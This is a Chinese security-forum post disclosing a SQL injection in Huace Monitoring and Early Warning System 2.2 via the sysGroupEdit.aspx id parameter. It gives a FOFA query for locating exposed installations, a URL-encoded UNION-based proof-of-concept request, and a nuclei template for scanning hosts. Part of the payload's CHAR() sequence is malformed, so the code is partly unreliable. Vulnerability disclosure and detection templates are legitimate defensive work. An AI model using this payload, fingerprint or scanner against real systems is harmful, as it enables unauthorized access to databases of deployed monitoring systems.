华测监测预警系统2.2 sysGroupEdit.aspx SQL注入-网络安全论坛-网络安全-阻击者联盟

华测监测预警系统2.2 sysGroupEdit.aspx SQL注入

勾八徽章-资深玩家-阻击者联盟等级-LV2-阻击者联盟1个月前发布
50

免责声明

       请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述:

影响版本:

FOFA:

body="<di v id="logo">华测监测预警系统2.2" || (body="App_Themes/Flat/Login/logo-top.png" && body="App_Themes/Flat/Login/Login.css"

POC:

GET /Web/SysManage/sysGroupEdit.aspx?id=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%2889%29%2BCHAR%28118%29%2BCHAR%2889%29%2BCHAR%2888%29%2BCHAR%28105%29%2BCHAR%28119%29%2BCHAR%2898%29%2BCHAR%28110%29%2BCHAR%2867%29%2BCHAR%28114%29%2BCHAR%28113%29%2BCHAR%2877%29%2BCHAR%2886%29%2BCHAR%2869%29%2BCHAR%28118%29%2BCHAR%2885%29%2BCHAR%28120%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%2866%29%2BCHAR%2899%29%2BCHAR%2868%29%2BCHAR%2897%29%2BCHAR%2869%29%2BCHAR%28117%29%2BCHAR%2875%29%2BCHAR%2876%29%2BCHAR%28115%29%2BCHAR%2874%29%2BCHAR%2866%2BCHAR%2873%29%2BCHAR%2888%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%2877%2BCHAR%2876%2BCHAR%2880%2BCHAR%2898%2BCHAR%28119%2BCHAR%2889%2BCHAR%28113%2BCHAR%28106%2BCHAR%28106%2BCHAR%28118%2BCHAR%28113%29--+wkZw
Host:
Accept: */*
利用union注入的方式进行利用,返回值中如果存在qzpbqYvYXiwbnCrqMVEvUxhoBcDaEuKLsJBIxqMLPbwYqjjvq则表示存在漏洞
nuclei模板:
id: huace-sql-injection

info:
  name: Huace Monitoring and Early Warning System SQL Injection
  author: ProjectDiscoveryAI
  severity: high
  description: |
    Detects SQL Injection vulnerability in 华测监测预警系统 (Huace Monitoring and Early Warning System) version 2.2 via the sysGroupEdit.aspx endpoint.
  tags: sql-injection

http:
  - raw:
      - |
        GET /Web/SysManage/sysGroupEdit.aspx?id=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%2889%29%2BCHAR%28118%29%2BCHAR%2889%29%2BCHAR%2888%29%2BCHAR%28105%29%2BCHAR%28119%29%2BCHAR%2898%29%2BCHAR%28110%29%2BCHAR%2867%29%2BCHAR%28114%29%2BCHAR%28113%29%2BCHAR%2877%29%2BCHAR%2886%29%2BCHAR%2869%29%2BCHAR%28118%29%2BCHAR%2885%29%2BCHAR%28120%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%2866%29%2BCHAR%2899%29%2BCHAR%2868%29%2BCHAR%2897%29%2BCHAR%2869%29%2BCHAR%28117%29%2BCHAR%2875%29%2BCHAR%2876%29%2BCHAR%28115%29%2BCHAR%2874%29%2BCHAR%2866%2BCHAR%2873%29%2BCHAR%2888%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%2877%2BCHAR%2876%2BCHAR%2880%2BCHAR%2898%2BCHAR%28119%2BCHAR%2889%2BCHAR%28113%2BCHAR%28106%2BCHAR%28106%2BCHAR%28118%2BCHAR%28113%29--+wkZw HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "qzpbqYvYXiwbnCrqMVEvUxhoBcDaEuKLsJBIxqMLPbwYqjjvq"

      - type: status
        status:
          - 200

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布帖子
在手机上浏览此页面